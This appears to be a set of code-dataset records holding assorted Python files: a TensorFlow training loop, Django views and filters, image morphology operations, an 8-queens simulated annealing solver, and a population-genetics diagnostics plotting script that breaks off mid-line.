range(DATASET_IO_EXAMPLES):\n input_example = tf.constant([n for i in range(BATCH_SIZE)], tf.float32)\n output_prediction = behavior_batch(input_example)\n behavior_loss = loss(output_prediction, input_example)\n\n\n # Obtain total loss of entire model\n total_loss = tf.add_n(tf.get_collection(COLLECTION_LOSSES), name=(PREFIX_TOTAL + EXTENSION_LOSS))\n gradient_batch = train(total_loss)\n\n\n # Store datapoints each epoch for plot\n data_points = []\n\n\n # Report testing progress\n class LogProgressHook(tf.train.SessionRunHook):\n\n # Session is initialized\n def begin(self):\n self.current_step = 0\n self.batch_speed = 0\n\n\n # Just before inference\n def before_run(self, run_context):\n self.current_step += 1\n self.start_time = time()\n return tf.train.SessionRunArgs([syntax_batch, syntax_loss])\n\n\n # Just after inference\n def after_run(self, run_context, run_values):\n\n # Calculate weighted speed\n self.batch_speed = (0.2 * self.batch_speed) + (0.8 * (1.0 / (time() - self.start_time + 1e-7)))\n\n\n # Update every period of steps\n if (self.current_step % EPOCH_SIZE == 0):\n\n # Obtain graph results\n syntax_value, loss_value = run_values.results\n\n\n # Display date, batch speed, estimated time, loss, and accuracy\n print(\n datetime.now(),\n \"CUR: %d\" % self.current_step,\n \"REM: %d\" % (num_steps - self.current_step),\n \"SPD: %.2f bat/sec\" % self.batch_speed,\n \"ETA: %.2f hrs\" % ((num_steps - self.current_step) / self.batch_speed / 60 / 60),\n \"L: %.2f\" % loss_value)\n\n\n # Record current loss\n data_points.append(loss_value)\n\n\n # Prepare to save and load models\n model_saver = tf.train.Saver()\n\n\n # Perform computation cycle based on graph\n with tf.train.MonitoredTrainingSession(hooks=[\n tf.train.StopAtStepHook(num_steps=100),\n tf.train.CheckpointSaverHook(\n CHECKPOINT_BASEDIR,\n save_steps=EPOCH_SIZE,\n saver=model_saver)]) as session:\n\n # Repeat training iteratively\n while not session.should_stop():\n\n # Run single batch of training\n session.run(gradient_batch)\n\n\n # Construct and save plot\n import matplotlib.pyplot as plt\n plt.plot(data_points)\n plt.xlabel(\"Training Epoch\")\n plt.ylabel(\"Mean Huber Syntax Loss\")\n plt.savefig(datetime.now().strftime(\"%Y_%B_%d_%H_%M_%S\") + \"_syntax_training_loss.png\")\n\nif __name__ == \"__main__\":\n train_epf_8()\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":12717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"109063696","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 11 17:30:38 2019\n\n@author: Education\n\"\"\"\n\nlist1=list(map(int,input().split()))\ndef centered(list2):\n sort_list=[]\n sort_list=sorted(list2)\n print(sort_list)\n sum1=0\n add=0\n a=len(list2)\n for i in sort_list[1:a-1]:\n sum1=sum1+i\n add=len(list2)-2\n mean_avg=0.0\n mean_avg=(sum1/add)\n return mean_avg\na=centered(list1)\nprint(a)\n \n\n\n","sub_path":"centered.py","file_name":"centered.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"119258918","text":"from datetime import datetime\n\ndef datetimeformat(value, format='%B %d, %Y'):\n if value:\n init_date = datetime.strptime(str(value), '%Y-%m-%d %H:%M:%S.%f')\n return init_date.strftime(format)\n else:\n return '-'\n\n\ndef days_since_init_contact(value):\n init_date = datetime.strptime(value, '%Y-%m-%d %H:%M:%S.%f')\n now = datetime.now()\n difference = now - init_date\n\n #convert the difference into seconds\n difference = difference.total_seconds()\n\n #do some math to convert the seconds into days\n minutes = difference / 60\n hours = minutes / 60\n days = hours / 24\n\n if days < 1:\n return '<1 day ago'\n elif int(days) < 2:\n return '1 day ago'\n else:\n return str(int(days)) + ' days ago'","sub_path":"filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"162510445","text":"import math\n\n# Define some constants.\nsqrt5 = math.sqrt(5)\nphi = (1+sqrt5)/2\n\ndef fib(n):\n\treturn math.floor(math.pow(phi,n+1)/sqrt5 + 0.5)\n\n# Return list of fib sequence up to nth.\ndef fib_list(n):\n\tlist = []\n\tfor i in range(n):\n\t\tlist += [fib(i)]\n\treturn list\n","sub_path":"code/moving_average_naive/fib.py","file_name":"fib.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"576320406","text":"#coding:utf-8\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom homeapp.BLL.ttest_service import ttest_service\nfrom homeapp.BLL.tnote_service import tnote_service\nfrom homeapp.models import TNote\nimport time\nimport datetime\nimport json\nimport uuid\n\nclass note:\n\n @staticmethod\n def index(request):\n\n # 查询数据库\n items = tnote_service.selectall()\n obj = {\n \"viewmodel\":{\n \"items\":items\n }\n }\n # print obj[\"viewmodel\"][\"items\"][0]\n return render(request, \"homeapp/note_index.html\", obj)\n\n \t# return render(request, \"homeapp/note_index.html\", pageModel)\n\n @staticmethod\n def ajax_addnote(request):\n\n ajaxmodel = {}\n\n # 得到输入的标题\n TxtValue = request.POST.get(\"title\")\n\n # 得到当前的时间\n thistime = time.localtime()\n strtime = time.strftime(\"%Y-%m-%d\", thistime)\n LogDateTime = datetime.datetime.strptime(strtime, \"%Y-%m-%d\")\n\n # guid\n guidvalue=str(uuid.uuid1())\n\n # 作者的id(临时)\n AGValue = str(uuid.uuid1())\n\n # NoteType_Guid\n NoteType_Guid = \"cfd58bcb-f96d-11e5-ac22-000c29a84f46\"\n\n # Path\n ajaxmodel[\"guid\"] = guidvalue\n ajaxmodel[\"Account_Guid\"] = AGValue\n # ajaxmodel[\"NoteDateTime\"] = time.strftime(\"%Y-%m-%d\",LogDateTime)\n ajaxmodel[\"Path\"] = \"\"\n ajaxmodel[\"Text\"] = TxtValue\n ajaxmodel[\"NoteType_Guid\"] = NoteType_Guid\n\n # 添加到库\n newnote = TNote(guid=guidvalue\n ,Account_Guid=AGValue\n ,NoteDateTime=LogDateTime\n ,Path=\"\"\n ,Text=TxtValue\n ,NoteType_Guid = \"cfd58bcb-f96d-11e5-ac22-000c29a84f46\")\n newnote.save()\n\n return HttpResponse(json.dumps(ajaxmodel), content_type=\"application/json\")\n\"\"\"\n retdata = {}\n retdata['name'] = 'abc'\n retdata['pwd'] = 'cde'\n retdata['arr'] = [{\n \"name\":123\n },\n {\n \"name\":123,\n \"pwd\":333\n }]\n return HttpResponse(json.dumps(retdata), content_type=\"application/json\")\n #\n\"\"\"\n\"\"\"\nimport json\nfrom django.http import HttpResponse\n\nresponse_data = {}\nresponse_data['result'] = 'failed'\nresponse_data['message'] = 'You messed up'\nreturn HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\"\"\"\n","sub_path":"cpp13_jsb_project/homeapp/CONTROLLER/note_controller.py","file_name":"note_controller.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"584393513","text":"import cv2\nimport numpy as np\n\n\ndef erosion(img):\n w = img.shape[0]\n h = img.shape[1]\n dil = np.zeros((w, h))\n for i in range(w):\n for j in range(h):\n if (img[i][j] == 255):\n if (i == 0 or j == 0 or i == w - 1 or j == h - 1):\n continue\n if (img[i - 1][j - 1] == 255 and img[i - 1][j] == 255 and img[i - 1][j + 1] == 255 and img[i][\n j - 1] == 255 and img[i][j] == 255 and img[i][j + 1] == 255 and img[i + 1][j - 1] == 255 and img[i + 1][\n j] == 255 and img[i + 1][j + 1] == 255):\n dil[i][j] = 255\n\n return dil\n\n\ndef dilation(img_r, r, c):\n for i in range(0, r - 2):\n for j in range(0, c - 2):\n if (img_r[i][j] == 255 or img_r[i][j + 1] == 255 or img_r[i][j + 2] == 255 or img_r[i + 1][j] == 255 or\n img_r[i + 1][j + 2] == 255 or img_r[i + 2][j] == 255 or img_r[i + 2][j + 1] == 255 or img_r[i + 2][\n j + 2] == 255):\n img_r[i][j] = 255\n return img_r\n\n\n#Please change path\nimage_colour = cv2.imread('/Users/vivad/PycharmProjects/CLFinalProject/original_imgs/noise.jpg', 0)\nimage_dupe = image_colour.copy()\nimageAA = image_colour.copy()\nimg_len = image_dupe.shape\nr = img_len[0]\nc = img_len[1]\n\n# Morphology algorithm 1 -\n# Closing followed by opening\n# Closing Operation - Dilation + Erosion\ndil1 = dilation(image_dupe, r, c)\ndil_copy = dil1.copy()\nafter_erosion = erosion(dil_copy)\n\n# Opening Operation - Erosion + Dilation\nagain_erosion = erosion(after_erosion)\nerosion_copy = again_erosion.copy()\nfinal_algo1_output = dilation(erosion_copy, r, c)\n\n# Morphology algorithm 2\n# Opening followed by closing\n# Opening Operation - Erosion + Dilation\nimageA = erosion(imageAA)\nimageB = imageA.copy()\nimageC = dilation(imageB, r, c)\n\n# Closing Operation - Dilation + Erosion\nimageD = dilation(imageC, r, c)\nimageE = imageD.copy()\nfinal_algo2_output = erosion(imageE)\n\n#Please change path\ncv2.imwrite(\"/Users/vivad/PycharmProjects/CLFinalProject/Task1/res_noise2.jpg\", final_algo2_output)\ncv2.imwrite(\"/Users/vivad/PycharmProjects/CLFinalProject/Task1/res_noise1.jpg\", final_algo1_output)\n\n# Computing boundaries of images using difference between morphed image and its erosion result\nFinal_A = final_algo1_output.copy()\nFinal_B = final_algo2_output.copy()\n\nerode_B = erosion(Final_B)\nerode_A = erosion(Final_A)\nres_bound1 = Final_A - erode_A\nres_bound2 = Final_B - erode_B\n\n\n#Please change path\ncv2.imwrite(\"/Users/vivad/PycharmProjects/CLFinalProject/Task1/res_bound1.jpg\", res_bound1)\ncv2.imwrite(\"/Users/vivad/PycharmProjects/CLFinalProject/Task1/res_bound2.jpg\", res_bound2)\n\n\n","sub_path":"Project_3/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"436612371","text":"class Atm(object):\r\n def __init__(self,name,pin,):\r\n self.name=name\r\n self.pin=pin\r\n \r\n def info(self):\r\n print(\"Account name is : \"+self.name)\r\n print(\"card pin is : \"+self.pin)\r\n \r\nAtm1=Atm(\"Avaneesh Sawant\",\"2364\")\r\nAtm2=Atm(\"Sanjana Sawant\",\"3018\")\r\nAtm1.info()\r\n\r\n\r\n ","sub_path":"atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"440967080","text":"from math import log, exp, fabs, inf\nfrom random import randint, random, seed\nfrom os import system\nimport subprocess as sp\nfrom time import sleep\n\n\nclass SimulatedAnnealing:\n \"\"\"\n Queens are represented as a list of position\n E.g.: [1, 5, 3, 5, 2, 6, 0, 7] that is\n Queen in first column is in 2nd cell and\n Queen in 7th column is in 1st cell\n \"\"\"\n\n def __init__(self, t_max=500., t_min=0, steps=500):\n self.T_max = t_max\n self.T_min = t_min\n # self.T_factor = -log(self.T_max / self.T_min)\n self.steps = steps\n self.T = t_max\n seed(1)\n\n def schedule(self, t):\n return self.T_max * exp(self.T_factor * t / self.steps)\n\n def schedule2(self, t):\n T = self.T_max - ((self.T_max - self.T_min) / self.steps) * t\n return T\n\n def anneal(self, initial_state=None, visualize=True, animation=False, log_output=None):\n if initial_state is None:\n current_state = self.random_initial_state()\n else:\n current_state = initial_state\n if log_output is None:\n log_output = animation\n\n t = 0\n while True:\n t += 1\n temperature = self.schedule2(t)\n # if temperature < self.T_min + 0.01:\n if temperature < 0:\n if visualize:\n return self.tap(self.visualize, current_state)\n else:\n return current_state\n next_state = self.random_successor(current_state)\n next_value = self.value(next_state)\n if next_value is inf:\n break\n current_value = self.value(current_state)\n d_energy = next_value - current_value\n\n if animation:\n # system(\"cls\")\n sleep(1)\n tmp = sp.call('cls', shell=True)\n if log_output:\n self.visualize(current_state, {\"ΔE\": d_energy, \"Time\": t})\n\n if d_energy > 0:\n current_state = next_state\n elif exp(d_energy / temperature) > random():\n current_state = next_state\n\n if visualize:\n tmp = sp.call('cls', shell=True)\n return self.tap(self.visualize, current_state)\n else:\n return current_state\n\n @staticmethod\n def random_initial_state():\n state = [randint(0, 7) for i in range(8)]\n return state\n\n @staticmethod\n def random_successor(current):\n rand_queen = randint(0, 7)\n rand_move = randint(0, 7) - current[rand_queen]\n successor = [value for value in current]\n successor[rand_queen] += rand_move\n return successor\n\n @staticmethod\n def count_checks(state):\n checks = 0\n for i in range(8):\n for j in range(i + 1, 8):\n if state[i] is state[j]:\n checks += 1\n elif fabs(SimulatedAnnealing.slop(i, state[i], j, state[j])) == 1:\n checks += 1\n return checks\n\n @staticmethod\n def value(state):\n checks = SimulatedAnnealing.count_checks(state)\n if checks is 0:\n return inf\n return 56 / checks\n\n @staticmethod\n def slop(x1, y1, x2, y2):\n return (x1 - x2) / (y1 - y2)\n\n @staticmethod\n def tap(func, value):\n func(value)\n return value\n\n @staticmethod\n def visualize(state, params={}):\n printf = lambda *args: print(*args, end='')\n min_check = inf\n for i in range(8):\n printf(\"| \")\n for j in range(8):\n if state[j] is i:\n printf(\"Q | \")\n else:\n new_state = [value for value in state]\n new_state[i] = j\n check = SimulatedAnnealing.count_checks(new_state)\n if check < min_check:\n min_check = check\n printf(\"{}{}| \".format(check, ' ' if check < 10 else ''))\n printf(\"\\n\")\n\n for key, check in params.items():\n print(\"{}: {}\".format(key, check))\n printf(\"min check: {}\".format(min_check))\n print(\"\")\n\n\nSimulatedAnnealing(steps=200).anneal(animation=True)\n","sub_path":"assignments/assignment3/SimulatedAnnealing.py","file_name":"SimulatedAnnealing.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"205044833","text":"# -----------------------------------------------------------------------------\n# diagnostics.py\n# 2014 01 29: Erin Landguth\n# This script grabs output.csv files, splits bars, and grabs diagnostics for checking CDPOP/CDFISH/CDmetaPOP\n# v0 - Initial script\n# ----------------------------------------------------------------------------- \n\n# Load modules\nimport os,pdb,pandas\nfrom pylab import *\t\nimport scipy as sp\t\t\t\n\n# Numpy functions\ntry:\n\timport numpy as np \n\tfrom numpy.random import *\nexcept ImportError:\n\traise ImportError(\"Numpy required.\")\n\n# ---------\n# User info\n# ---------\n# Directory locations of folders\n#dir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanStable_expN_120gens_2K500N_Kenv1000_1411750885/'\n#plottitle = 'PAN Stable 2K Exponential N'\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanStable_expAtBirth_120gens_2K500N_Kenv1000_1411751507/'\nplottitle = 'PAN Stable 2K Exponential AtBirth'\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanStable_logAtBirth_120gens_2K500N_Kenv1000_1411751520/'\nplottitle = 'PAN Stable 2K Logistic AtBirth'\n#dir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanStable_logN_120gens_2K500N_Kenv1000_1411748653/'\n#plottitle = 'PAN Stable 2K Logistic N'\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanIncrease_exp_50gens_2K500N_1411754599/'\nplottitle = 'PAN Increasing 2K Exponential N'\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanStable_exps0pt26_120gens_2K500N_1411753815/'\nplottitle = 'PAN Increasing s0=0.26 2K Exponential N'\n\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanDecrease_exp_100gens_2K500N_1411759172/'\nplottitle = 'PAN Decreasing s0=0.24 2K Exponential N'\n\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/IBDStable_exp_400gens_2K500N_testHe_1411763780/'\nplottitle = 'IBDMax Stable s0=0.25... 2K Exponential N'\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanFluctuate_exp_94gens_2K500N_1411764557/'\nplottitle = 'PAN Fluctuate s0=0.25... 2K Exponential N'\n\n#dir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/IBDIncrease_pt29_exp_50gens_2K500N_1411766939/'\n#plottitle = 'IBD Increase s0=0.29 2K Exponential N'\n\n#dir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/IBDDecrease_pt21_exp_50gens_2K500N_1411766969/'\n#plottitle = 'IBD Decrease s0~0.21 2K Exponential N'\n\n#dir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanFluctuate_log_94gens_2K500N_1411831887/'\n#plottitle = 'PAN Fluctuate s0~0.29 to 0.21 2K Logistic N'\n\nsavename = ''\noutdir = dir\n\nsavedpi = 300\nqnorm = 1.959964 # For CIs, not in function \ngen = 94 # Number of years \nnthfile = list(range(0,gen,1))\nmaxA = 900 # loci * alleles\nbatchno = 1 # Number of batches\nmcno = 7 # Number of MCs\nplottime = np.asarray([1,9,19])\nK = 2000\n\n# List folders in this directory\ndef listdirs(folder):\n return [d for d in (os.path.join(folder, d1) for d1 in os.listdir(folder)) if os.path.isdir(d)]\nfolderList = listdirs(dir)\n\n# ---------------------------------\n# Storage variables\n# ---------------------------------\n# Store values\nN = [] # 1\nN_age = []\ngrowthrate = []\ntotF = [] # 4\ntotM = [] #5\nbreedF = [] #6\nbreedM = [] #8\nbirths = [] #13\nmort_age = [] # 15\n\nalleles = [] #16\nHe = [] #17\nHo = [] #18\n'''\noutputtitle = ['Year','Population','Population_Age','ToTFemales','ToTMales',\\\n\t'BreedFemales','BreedFemales_Age','BreedMales','BreedEvents_Females','Females_NoMate',\\\n\t'Migrants','DisperseDeaths','Births','EggDeaths',\\\n\t'AgeDeaths','Alleles','He','Ho','Mutations',\\\n\t'MateDistED','MateDistEDstd','Female_DispDistED','Female_DispDistEDstd',\\\n\t'Male_DispDistED','Male_DispDistEDstd','MateDistCD','MateDistCDstd',\\\n\t'Female_DispDistCD','Female_DispDistCDstd','Male_DispDistCD','Male_DispDistCDstd',\\\n\t'p1','p2','q1','q2','Infected','SubpopImmigration','SubpopEmigration','FemalesMeanMate',\\\n\t'MalesMeanMate','FemalesSDMate','MalesSDMate','OpenLocations','CouldNotDisperse']\n'''\n# Loop through batches\nfor ibatch in range(batchno):\n\n\t# Add storage spot\n\tN.append([])\n\tN_age.append([])\n\tgrowthrate.append([])\n\ttotM.append([])\n\ttotF.append([])\n\tbreedF.append([])\n\tbreedM.append([])\n\tbirths.append([])\t\n\tmort_age.append([]) #11 with total\n\talleles.append([])\n\tHe.append([])\n\tHo.append([])\n\t\n\t# Loop through MCs\n\tfor imc in range(mcno):\n\t\n\t\t# Open output.csv file in folder\n\t\tinputfile = open(dir+'batchrun'+str(ibatch)+'mcrun'+str(imc)+'/output.csv')\n\t\t\n\t\t# Read lines from the file\n\t\tlines = inputfile.readlines()\n\n\t\t#Close the file\n\t\tinputfile.close()\n\n\t\t# Create an empty matrix to append to\n\t\tvalues = []\n\n\t\t# Split up each line in file and append to empty matrix for generation specified\n\t\tfor i in range(len(lines)):\n\t\t\tthisline = lines[i].split(',')\n\t\t\tvalues.append(thisline)\n\n\t\t# Delete lines\n\t\tdel(lines)\n\t\t\n\t\t# Store values\n\t\tN[ibatch].append([])\n\t\tN_age[ibatch].append([])\n\t\tgrowthrate[ibatch].append([])\n\t\ttotM[ibatch].append([])\n\t\ttotF[ibatch].append([])\n\t\tbreedF[ibatch].append([])\n\t\tbreedM[ibatch].append([])\n\t\tbirths[ibatch].append([])\n\t\tmort_age[ibatch].append([]) #11 with total\n\t\talleles[ibatch].append([])\n\t\tHe[ibatch].append([])\n\t\tHo[ibatch].append([])\n\t\t\n\t\t# Then Loop through generations/time\n\t\tfor iout in range(gen):\n\t\t\n\t\t\talleles[ibatch][imc].append([])\n\t\t\tHe[ibatch][imc].append([])\n\t\t\tHo[ibatch][imc].append([])\n\t\t\tmort_age[ibatch][imc].append([])\n\t\t\tN_age[ibatch][imc].append([])\n\t\t\t\n\t\t\t# Patch split - grab the first value\n\t\t\tN[ibatch][imc].append(float(int(values[1+iout][1].split('|')[0])))\n\t\t\ttotF[ibatch][imc].append(int(values[1+iout][4].split('|')[0]))\n\t\t\ttotM[ibatch][imc].append(int(values[1+iout][5].split('|')[0]))\n\t\t\tbreedF[ibatch][imc].append(int(values[1+iout][6].split('|')[0]))\n\t\t\tbreedM[ibatch][imc].append(int(values[1+iout][8].split('|')[0]))\n\t\t\tbirths[ibatch][imc].append(int(values[1+iout][13].split('|')[0]))\n\t\t\tif values[1+iout][3] == 'NA':\n\t\t\t\tgrowthrate[ibatch][imc].append(np.nan)\n\t\t\telse:\n\t\t\t\tgrowthrate[ibatch][imc].append(float(values[1+iout][3]))\n\t\t\t\t\t\t\n\t\t\t# Age split\n\t\t\tfor j in range(len(values[1+iout][15].split('|'))-1):\n\t\t\t\tmort_age[ibatch][imc][iout].append(float(values[1+iout][15].split('|')[j]))\n\t\t\t\tN_age[ibatch][imc][iout].append(float(values[1+iout][2].split('|')[j]))\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t# Grab all patch values - patch values with total\n\t\t\tfor j in range(len(values[1+iout][16].split('|'))-1):\n\t\t\t\talleles[ibatch][imc][iout].append(float(values[1+iout][16].split('|')[j]))\n\t\t\t\tHe[ibatch][imc][iout].append(float(values[1+iout][17].split('|')[j]))\n\t\t\t\tHo[ibatch][imc][iout].append(float(values[1+iout][18].split('|')[j]))\n\t\t\t\t\t\t\t\n\t\t\t\n# Turn into arrays\nbirths = np.asarray(births)\ntotF = np.asarray(totF)\nalleles = np.asarray(alleles)\nHe = np.asarray(He)\nHo = np.asarray(Ho)\nallD = (alleles - 1) / (maxA - 1.)\nN = np.asarray(N)\ntotM = np.asarray(totM)\nbreedF = np.asarray(breedF)\nbreedM = np.asarray(breedM)\nmort_age = np.asarray(mort_age)\nN_age = np.asarray(N_age)\ngrowthrate = np.asarray(growthrate)\n\n# --------------------------------------------\n# Get mean over Monte Carlosfor each batch run\n# --------------------------------------------\n# Get Mean, SD, error, Left and Right\nN_m = np.nansum(N[:][:],axis=1)/mcno\nN_sd = np.std(N[:][:],axis=1)\t\nerror = qnorm*N_sd/(mcno)\nN_l = N_m-error\nN_r = \tN_m+error\nN_min = np.min(N[:][:],axis=1)\nN_max = np.max(N[:][:],axis=1)\t\n\ngrowthrate_m = np.nansum(growthrate[:][:],axis=1)/mcno\ngrowthrate_sd = np.std(growthrate[:][:],axis=1)\t\nerror = qnorm*growthrate_sd/(mcno)\ngrowthrate_l = growthrate_m-error\ngrowthrate_r = \tgrowthrate_m+error\ngrowthrate_min = np.min(growthrate[:][:],axis=1)\ngrowthrate_max = np.max(growthrate[:][:],axis=1)\n\ntotM_m = np.nansum(totM[:][:],axis=1)/mcno\ntotM_sd = np.std(totM[:][:],axis=1)\t\nerror = totM_sd*qnorm/mcno\ntotM_l = totM_m-error\ntotM_r = \ttotM_m+error\ntotM_min = np.min(totM[:][:],axis=1)\ntotM_max = np.max(totM[:][:],axis=1)\n\ntotF_m = np.nansum(totF[:][:],axis=1)/mcno\ntotF_sd = np.std(totF[:][:],axis=1)\t\nerror = qnorm*totF_sd/(mcno)\ntotF_l = totF_m-error\ntotF_r = \ttotF_m+error\ntotF_min = np.min(totF[:][:],axis=1)\ntotF_max = np.max(totF[:][:],axis=1)\n\nbreedF_m = np.nansum(breedF[:][:],axis=1)/mcno\nbreedF_sd = np.std(breedF[:][:],axis=1)\t\nerror = qnorm*breedF_sd/(mcno)\nbreedF_l = breedF_m-error\nbreedF_r = \tbreedF_m+error\nbreedF_min = np.min(breedF[:][:],axis=1)\nbreedF_max = np.max(breedF[:][:],axis=1)\n\nbreedM_m = np.nansum(breedM[:][:],axis=1)/mcno\nbreedM_sd = np.std(breedM[:][:],axis=1)\t\nerror = qnorm*breedM_sd/(mcno)\nbreedM_l = breedM_m-error\nbreedM_r = \tbreedM_m+error\nbreedM_min = np.min(breedM[:][:],axis=1)\nbreedM_max = np.max(breedM[:][:],axis=1)\nbirths_m = np.nansum(births[:][:],axis=1)/mcno\nbirths_sd = np.std(births[:][:],axis=1)\t\nerror = qnorm*births_sd/(mcno)\nbirths_l = births_m-error\nbirths_r = \tbirths_m+error\nbirths_min = np.min(births[:][:],axis=1)\nbirths_max = np.max(births[:][:],axis=1)\n\nmort_age_m = np.nansum(mort_age[:][:],axis=1)/mcno\nmort_age_sd = np.std(mort_age[:][:],axis=1)\t\nerror = qnorm*mort_age_sd/(mcno)\nmort_age_l = mort_age_m-error\nmort_age_r = \tmort_age_m+error\nmort_age_min = np.min(mort_age[:][:],axis=1)\nmort_age_max = np.max(mort_age[:][:],axis=1)\n\nN_age_m = np.nansum(N_age[:][:],axis=1)/mcno\nN_age_sd = np.std(N_age[:][:],axis=1)\t\nerror = qnorm*N_age_sd/(mcno)\nN_age_l = N_age_m-error\nN_age_r = \tN_age_m+error\nN_age_min = np.min(N_age[:][:],axis=1)\nN_age_max = np.max(N_age[:][:],axis=1)\n\nHe_m = np.nansum(He[:][:],axis=1)/mcno\nHe_sd = np.std(He[:][:],axis=1)\t\nerror = qnorm*He_sd/(mcno)\nHe_l = He_m-error\nHe_r = \tHe_m+error\nHe_min = np.min(He[:][:],axis=1)\nHe_max = np.max(He[:][:],axis=1)\n\nHo_m = np.nansum(Ho[:][:],axis=1)/mcno\nHo_sd = np.std(Ho[:][:],axis=1)\t\nerror = qnorm*Ho_sd/(mcno)\nHo_l = Ho_m-error\nHo_r = \tHo_m+error\nHo_min = np.min(Ho[:][:],axis=1)\nHo_max = np.max(Ho[:][:],axis=1)\n\nallD_m = np.nansum(allD[:][:],axis=1)/mcno\nallD_sd = np.std(allD[:][:],axis=1)\t\nerror = qnorm*allD_sd/(mcno)\nallD_l = allD_m-error\nallD_r = \tallD_m+error\n\n# --------------------------------\n# Other summary data \n# -------------------------------- \n\n# Growth rate - total population Nt / Nt-1\nNt = N[:,:,1:gen] / N[:,:,0:gen-1]\nN_growth_pop_m = np.nansum(Nt[:][:],axis=1)/(mcno)\nN_growth_pop_sd = np.nanstd(Nt[:][:],axis=1)\t\nerror = qnorm*N_growth_pop_sd/(mcno)\nN_growth_pop_l = N_growth_pop_m-error\nN_growth_pop_r = \tN_growth_pop_m+error\nN_growth_pop_min = np.nanmin(Nt[:][:],axis=2)\nN_growth_pop_max = np.nanmax(Nt[:][:],axis=2)\n\n# --------------------------------------------------------\n# Plotting\n# --------------------------------------------------------\n\n# Plot all initial N - total population - fill between\n# ----------------------------------------------------\nfigure()\nplot(nthfile,N_m[0],'k-')\nplot(nthfile,N_l[0],'r.-', ms = 10)\nplot(nthfile,N_r[0],'r.-', ms = 10)\nfill_between(nthfile, N_min[0], N_max[0],color = 'b')\nfill_between(nthfile, N_l[0], N_r[0],color = 'r')\nxlabel('Time',fontsize=18)\nylabel('Population Total',fontsize=18)\ntitle(plottitle+' R='+str(round(np.nanmean(growthrate_m[0]),4)),fontsize=16)\naxis([-0.1,gen,0,K])\nlegend(loc=0)\n# Updating fontsize on axes\nfontsize=19\nax = gca()\nfor tick in ax.xaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nfor tick in ax.yaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nsavefig(dir+savename+'N.png',dpi=savedpi)\n\n\n# Plot All N as bar - stacked side by side\n# ------------------------------------------\nind = np.asarray(nthfile) # the x locations for the groups\nwidth = 0.15 # the width of the bars\nfig, ax = plt.subplots()\n\nrects1 = ax.bar(ind[0:len(plottime)], N_m[0][plottime], width, color='grey', edgecolor='black', hatch=\"/\")\nyminus = N_m[0][plottime]-N_min[0][plottime]\nyplus = N_m[0][plottime]-N_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+width/2., N_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects2 = ax.bar(ind[0:len(plottime)]+width, totF_m[0][plottime], width, color='grey', edgecolor='black', hatch=\"//\")\nyminus = totF_m[0][plottime]-totF_min[0][plottime]\nyplus = totF_m[0][plottime]-totF_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+3*width/2., totF_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects3 = ax.bar(ind[0:len(plottime)]+2*width, totM_m[0][plottime], width, color='grey', edgecolor='black')\nyminus = totM_m[0][plottime]-totM_min[0][plottime]\nyplus = totM_m[0][plottime]-totM_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+5*width/2., totM_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects4 = ax.bar(ind[0:len(plottime)]+3*width, breedF_m[0][plottime], width, color='grey', edgecolor='black', hatch=\"x\")\nyminus = breedF_m[0][plottime]-breedF_min[0][plottime]\nyplus = breedF_m[0][plottime]-breedF_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+7*width/2., breedF_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects5 = ax.bar(ind[0:len(plottime)]+4*width, breedM_m[0][plottime], width, color='grey', edgecolor='black', hatch=\"\\\\\")\nyminus = breedM_m[0][plottime]-breedM_min[0][plottime]\nyplus = breedM_m[0][plottime]-breedM_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+9*width/2., breedM_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects6 = ax.bar(ind[0:len(plottime)]+5*width, births_m[0][plottime], width, color='grey', edgecolor='black', hatch=\"+\")\nyminus = births_m[0][plottime]-births_min[0][plottime]\nyplus = 